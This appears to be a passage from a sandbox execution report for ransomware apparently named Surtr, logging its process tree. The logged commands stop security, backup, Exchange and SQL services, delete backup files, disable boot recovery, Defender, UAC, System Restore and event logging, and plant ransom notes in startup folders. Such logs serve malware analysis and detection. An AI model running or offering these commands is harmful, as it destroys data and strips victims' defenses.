    PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
    3⤵
    PID:3484
  - - C:\Windows\system32\net.exe
      net stop "BackupExecRPCService"
      4⤵
      PID:3500
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecRPCService"
        5⤵
        
        PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
    3⤵
    PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
    3⤵
    PID:3516
  - - C:\Windows\system32\net.exe
      net stop "BackupExecVSSProvider"
      4⤵
      PID:3524
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecVSSProvider"
        5⤵
        
        PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "EPSecurityService"
      4⤵
      PID:3548
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EPSecurityService"
        5⤵
        
        PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
    3⤵
    PID:3564
  - - C:\Windows\system32\net.exe
      net stop "IISAdmin"
      4⤵
      PID:3572
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IISAdmin"
        5⤵
        
        PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    3⤵
    PID:3600
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
      4⤵
      PID:3624
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
    3⤵
    PID:3592
  - - C:\Windows\system32\net.exe
      net stop "IMAP4Svc"
      4⤵
      PID:3608
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IMAP4Svc"
        5⤵
        
        PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
    3⤵
    PID:3632
  - - C:\Windows\system32\net.exe
      net stop "macmnsvc"
      4⤵
      PID:3640
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "macmnsvc"
        5⤵
        
        PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "masvc"
    3⤵
    PID:3656
  - - C:\Windows\system32\net.exe
      net stop "masvc"
      4⤵
      PID:3664
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "masvc"
        5⤵
        
        PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBAMService"
    3⤵
    PID:3688
  - - C:\Windows\system32\net.exe
      net stop "MBAMService"
      4⤵
      PID:3696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBAMService"
        5⤵
        
        PID:3704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
    3⤵
    PID:3712
  - - C:\Windows\system32\net.exe
      net stop "MBEndpointAgent"
      4⤵
      PID:3720
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBEndpointAgent"
        5⤵
        
        PID:3736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    PID:3728
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      4⤵
      PID:3744
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
    3⤵
    PID:3752
  - - C:\Windows\system32\net.exe
      net stop "McAfeeEngineService"
      4⤵
      PID:3768
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeEngineService"
        5⤵
        
        PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:3788
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
    3⤵
    PID:3796
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFramework"
      4⤵
      PID:3812
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFramework"
        5⤵
        
        PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:3828
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:3836
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
        5⤵
        
        PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:3852
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McShield"
    3⤵
    PID:3860
  - - C:\Windows\system32\net.exe
      net stop "McShield"
      4⤵
      PID:3876
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McShield"
        5⤵
        
        PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:3888
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:3904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3912
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfemms"
    3⤵
    PID:3920
  - - C:\Windows\system32\net.exe
      net stop "mfemms"
      4⤵
      PID:3928
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfemms"
        5⤵
        
        PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:3952
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
      4⤵
      PID:3968
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:4000
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
        5⤵
        
        PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfevtp"
    3⤵
    PID:3960
  - - C:\Windows\system32\net.exe
      net stop "mfevtp"
      4⤵
      PID:3976
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfevtp"
        5⤵
        
        PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:3984
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
      4⤵
      PID:4000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:4008
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MMS"
    3⤵
    PID:4016
  - - C:\Windows\system32\net.exe
      net stop "MMS"
      4⤵
      PID:4024
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MMS"
        5⤵
        
        PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:4048
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
      4⤵
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
    3⤵
    PID:4056
  - - C:\Windows\system32\net.exe
      net stop "mozyprobackup"
      4⤵
      PID:4080
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mozyprobackup"
        5⤵
        
        PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:4072
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
      4⤵
      PID:3084
    - - C:\Windows\system32\net.exe
        
        net stop "VMware NAT Service"
        5⤵
        
        PID:2604
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        6⤵
        
        PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:2768
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:2852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
    3⤵
    PID:3096
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer"
      4⤵
      PID:2856
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer"
        5⤵
        
        PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:2900
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
      4⤵
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
    3⤵
    PID:3112
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer100"
      4⤵
      PID:2904
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer100"
        5⤵
        
        PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:3116
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
      4⤵
      PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
    3⤵
    PID:2880
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer110"
      4⤵
      PID:2940
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer110"
        5⤵
        
        PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:3128
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
      4⤵
      PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:2632
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
      4⤵
      PID:2120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
    3⤵
    PID:2732
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeES"
      4⤵
      PID:2648
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeES"
        5⤵
        
        PID:2192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2820
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:2696
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
    3⤵
    PID:2644
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeIS"
      4⤵
      PID:2792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeIS"
        5⤵
        
        PID:2172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2356
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:2168
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
      4⤵
      PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
    3⤵
    PID:1588
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMGMT"
      4⤵
      PID:2692
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMGMT"
        5⤵
        
        PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1936
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
      4⤵
      PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
    3⤵
    PID:2832
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMTA"
      4⤵
      PID:888
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMTA"
        5⤵
        
        PID:1460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2184
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:652
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
    3⤵
    PID:1356
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSA"
      4⤵
      PID:2720
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSA"
        5⤵
        
        PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1552
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
    3⤵
    PID:1436
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSRS"
      4⤵
      PID:1752
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSRS"
        5⤵
        
        PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1060
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1900
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
    3⤵
    PID:1812
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SQL_2008"
      4⤵
      PID:736
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
        5⤵
        
        PID:1708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1712
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:3184
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:3172
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
        5⤵
        
        PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:640
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:3208
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
      4⤵
      PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
    3⤵
    PID:1904
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPS"
      4⤵
      PID:988
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPS"
        5⤵
        
        PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
    3⤵
    PID:3240
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPSAMA"
      4⤵
      PID:3256
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
        5⤵
        
        PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
    3⤵
    PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:3216
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$BKUPEXEC"
      4⤵
      PID:1012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
        5⤵
        
        PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
    3⤵
    - Drops startup file
    PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
    3⤵
    - Drops startup file
    PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
    3⤵
    PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
    3⤵
    PID:2948
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$ECWDB2"
      4⤵
      PID:2828
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
        5⤵
        
        PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
    3⤵
    PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
    3⤵
    PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
    3⤵
    PID:3296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
    3⤵
    PID:1252
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTICEMGT"
      4⤵
      PID:3304
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
        5⤵
        
        PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
    3⤵
    PID:3268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
    3⤵
    PID:2592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:2352
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTTICEBGC"
      4⤵
      PID:3036
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
        5⤵
        
        PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
    3⤵
    PID:2052
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\ProgramData\Service"
      4⤵
      Views/modifies file attributes
      PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:2232
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SHAREPOINT"
      4⤵
      PID:2544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
    3⤵
    PID:2344
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:2368
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
        5⤵
        
        PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
    3⤵
    PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
    3⤵
    PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
    3⤵
    PID:1228
- - C:\Windows\system32\cmd.exe
